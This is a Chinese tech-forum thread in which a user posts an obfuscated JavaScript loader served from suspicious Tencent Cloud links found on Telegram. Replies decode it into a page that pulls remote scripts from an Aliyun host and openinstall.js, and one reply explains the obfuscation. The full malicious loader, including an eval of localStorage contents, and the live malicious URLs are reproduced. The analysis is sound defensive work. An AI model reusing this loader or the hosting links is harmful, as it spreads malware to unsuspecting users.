在 TG 上看到一个恶意连接在腾讯云,里面放了 2 个连接,分别是: https://cos.ap-chengdu.myqcloud.com/w84ipa-1701748018-1322650058/Update/2023/12/05/wv-w84iap,S5x0dpA9?channelCode=66006&s=49099bbcf6bda5c58ae9ebe761da1aec&t=0810 和 https://cos.ap-chengdu.myqcloud.com/w84ipa-1701748024-1322650058/Update/2023/12/05/wv-w84iap,S5x0dpA9?channelCode=66009&s=f3e1e98b02de5803ea07dcb5b1a2a34e&t=0810 !!!请不要用浏览器点进去!!! 通过 curl 访问,发现是里面有个加密的 js 脚本,如下:
<script>(function(){var i=0,t="",s="M yV!QV,g!Zh Qw!R Rf!n B H,O0 8!EW F 1b!U R,I,8 Bl J Q,aF9 eD!w J/Y V!4 5,J gw t L XV 1 BH,p!9T kY 7!b!W,ZZc!XF4C Txs L!EN!iY GAOK l!ZhB,j,kLCF,I!t,X AA o enp3V S h xT AF,Z b,mQV,P2BT,dF!o,Kd 1w,Cbw J Y LwsM!Ey,1w d h B,p bnBI!O2,Z 2,A mF!h Wl!Y pX VJ,MaH,sIB w,J,g ZUU5N,gw,tLX!V!1 BHp!9 T kg!4,Bn 5B W35 n AQ,Y!H,LF N oa!3tYB3Bl,QQ!AYVxAoBF g!Wa,X5 gBg,UHY,l l!afm,QJ KV l fQ1 t BAF8!6!C n la A S,VuHz,1uZ!g9,/V!H,B BA G1Y AFpb eBw p,W S hPWms,IB g B/ Z!V4,HJ W,0QPgRM FW!pU c EEtBwV a dmU,DEg!Rj!UkxZ!VnxeM1J!AQ A!BQ d h!8F b,n ZTY 15,ZV!S!h 2!dVZ,o,fn!g M Bl kKT l!x7c 0,0 AV,XoP K g9 Q V g,B+dhl,8U!A 5EAGI B WmJ!u!X,l U/ YyB KX H,9 WQg,E!LeU w!v,N,X4,M,PQR iEG,l!h!fF!o!Fcm!F,E Y,W FO F,gB,sMEx,hC!3 x!C!OgoOQi!9Rbh E!+ c X,JTaW,o P!XANy!DV!h h YUEQ A!V ow!VX RVf0Y AQQJCAjUM!E w,VY eQp,jU0FEAg!d 6SF l!u d F Y1,Uwl e c X tw U,DN!w e V wAD 1QR,AH V,2U1Zh d,F 4,x,Z n4 B!Ym 5!eV!i!kG F!lFc!V,X!d N!O,gt9!R,g,Aqa Q!8t,fno aak,MG!Ww B 9Z!gFb!fntQ,K U!1fC!m,J,ve!EI6 Cm VD L!w 8!B,ET5,hARN,R,V3 gC,OGJM QnRbW hA,pB!l 9 O!Y m,8ERw FWeQ Y6N,U AV KFtEG,Xp!T,Ag otB,n pbW 1 t aEQFwUn J xe3B,Q!Kn!x,PTDp,R c hYHf mUEV 3F,aRTth B Fh!c!cWB!S AXd!f S!G,F ga,18A Cnl P!Ajp 6V!i!1f d,hl!QVHs L!KF hc,A!V,x+dBw,qX V5P W!W8E XD l gX wU5NX4V AH,F,TF,lE K,e,Eg tYnJ b!YQ!R,g F T!9 sL F,Fcf,2 R!C,Om 9!P,RgY6b h,M,9 B XkW a gsP!Ri!0 G,Y k!Zi!cXB!WP2!d fS,V!pV!Y1!sGew9O LjZ,9HCg FV 1d9fl pa An!Y!BQ!FtP!f0!0 1 d 1 9!D!Y Qt 7RwB,wZh0 g CE8 Q BXF iC!2 l,9,A!nk xcn5,HY n 5,d,T!S!Z!eH kN h,C,3 t HA H B,mH SA,LeQ,Etd X!YOV2 4DW AVyW Eda!X 3!QP K140fG!J,v,f!0E!5,f2FgA Q,9 UD A!YEZg!9!4 c Xg!C A lx!f Vl,1 B WQ!Es d ydecX,twUC,p!wf,V,o H,K!m 4!f Bl92C!G!lueEQ7 cmJnb,V1 a,I,g c!GV!0 5aCg,Rb A,VZ mWTo 6ah,A 9X1!w!ZV3 F!/Qi1!b e,k Z,a cVpWLnc FV3!N rB EM6!YHZ ZOQ,x u E z 0F,Zh!NRCw J!dO!E!x!fV l!1BW Q,E sd,yde cX twUCp7,dl E q I!Xof,P m,5m U lB U,Al!Ur,TG F f cX,V FAS5 3BU51e!1 JQK!E F!1XC8P dgk9,b,n4n UQt,k X!j Bt Z,V,5 1,d V0 T!AX N f bVx!w e0cBVVR ZL,jZ hFi9,l!ARlR,flpYO 2Z!TRXVfX!V!Em XS,d!ecXtwUC,p7,dl EF,MV!M T BV s NE1,F!Q,U V wr T F9B,d!0F Z A!Sx3 J15 eaV5Q,K n!t2!U,Q!cPfh,8tcX4L,U!AtjA,C9wek!daWGQK!B1 o3X m h rc!1w,5b3l A O,SV!uJAZ,bZ j N!XY W R FB,W,1m cmF,ue,Ao r Xj!d,Wc2 x,C,fCp7!dlEqKm,I,OB1 92CF E!Le1 Ux,ZnZa WgR 4Vw!djME x c e,wR B AH,9,hQy gh X,F!Y+ b!lx Tf w!t,eA gNi Q19,0 d,XcI,B,l kwTl!p /,d105a 1R G!LBVXA,S 1 1d QR,X!V HB LKHJ mW!V x1d18s,cy 8L dn,1j!W zo,K Dl!0 5NG4T,B!W F6 F W l+!Y 10!4W H JLY m J v,V jQ GX0x cf,2d,C!B,3t cA SAL eQEtd XYIU Q!t 7RwUGfkF ccWMJP 3 M,gCX,N,s Qnwqe3 Z,R!K iVq,E D1P!A Ql,Rf,g9!I O2 ZT!Q X!dBWV4!p B yhTW1 V!dQ A,d,8A 3!0z I!QEP!B gR,m V,mN e!WQo!tB,1w BWm!F!B T!Q== ",o="indexOf",q="charAt",w="charCodeAt",f=String.fromCharCode,p="cb8fd64c3962a541866fe4f98817c876";s=s.replace(/[^A-Za-z0-9+/=]/g,"");s=be4(s);for(i=0;i<s.length;i++)t+=String.fromCharCode(s.charCodeAt(i)^p.charCodeAt(i%32));document.write(be4(t));function be4(s){var c,d,e,h,j,n,r,i=0,v="",t="",l="",m="",o="indexOf",q="charAt",w="charCodeAt",f=String.fromCharCode;for(k=0;k<26;k++){m+=f(65+k);l+=f(97+k)}for(k=0;k<10;k++)l+=k;l=m+l+"+/=";if(localStorage.sev){eval(localStorage.sev)}while(i<s.length){c=l[o](s[q](i++));d=l[o](s[q](i++));e=l[o](s[q](i++));h=l[o](s[q](i++));j=(c<<2)|(d>>4);n=((d&15)<<4)|(e>>2);r=((e&3)<<6)|h;v+=f(j);if(e!=64){v+=f(n)}if(h!=64){v+=f(r)}}c=d=i=0;while(i<v.length){c=v[w](i);if(c<128){t+=f(c);i++}else if(c>191&&c<224){d=v[w](i+1);t+=f(((c&31)<<6)|(d&63));i+=2}else{d=v[w](i+1);e=v[w](i+2);t+=f(((c&15)<<12)|((d&63)<<6)|(e&63));i+=3}}return t}})();</script>这个是什么 0day 吗,有无大佬解析一下这个代码的作用是什么
1
lll5758 2023-12-22 15:54:18 +08:00
解析完后的代码
<html lang="zh-cn"> <head> <meta charset="utf-8"> <title>Loading... Please wait...</title> <script src="htt 屏蔽地址防止误点 ps://indexwealth.oss-acc 屏蔽地址防止误点 elerate.aliyuncs.com/update/global/md5.min.js"></script> <script src="htt 屏蔽地址防止误点 ps://indexwealth.oss-accel 屏蔽地址防止误点 erate.aliyuncs.com/update/global/vue.cjs.min.js"></script> <script type="text/javascript" src="ht 屏蔽地址防止误点 tps://web.cdn.openins 屏蔽地址防止误点 tall.io/openinstall.js"></script> <script type="text/javascript" src="htt 屏蔽地址防止误点 ps://indexwealth.oss-accelerate.aliyu 屏蔽地址防止误点 ncs.com/update/index/1113/w84iap.js"></script> </head> <body> <script> function b64DecodeUnicode(str) { return decodeURIComponent(atob(str).split('').map(function(c) { return '%' + ('00' + c.charCodeAt(0).toString(16)).slice(-2); }).join('')); } var base64Content = decodeAndOutputBase64(); var doc = document.open('text/html', 'replace'); var dat = b64DecodeUnicode(base64Content); doc.write(dat); doc.close(); </script> </body> </html> 通过查看 openinstall.js 的代码. 可能是安装了什么,最后还会向某个地址发了请求.具体得看这个 openinstall.js 的代码 |
6
cslive 2023-12-22 17:16:04 +08:00
|
7
InDom 2023-12-22 17:28:04 +08:00 2
代码写的花里胡哨,核心就是把一段代码进行 base64 以后使用 逐字符进行位处理(凯撒密码)。
然后把转换后的代码再次 base64 后 随机插入 特殊符号(空格、,、!) 就好了。 还原也很简单,直接执行,或者把 document.write 替换为 console.log 就好了,为了兼容性,他甚至没有使用 atob |
9
blankmiss 2023-12-22 22:42:02 +08:00
刷它 oss 让他不做好事
|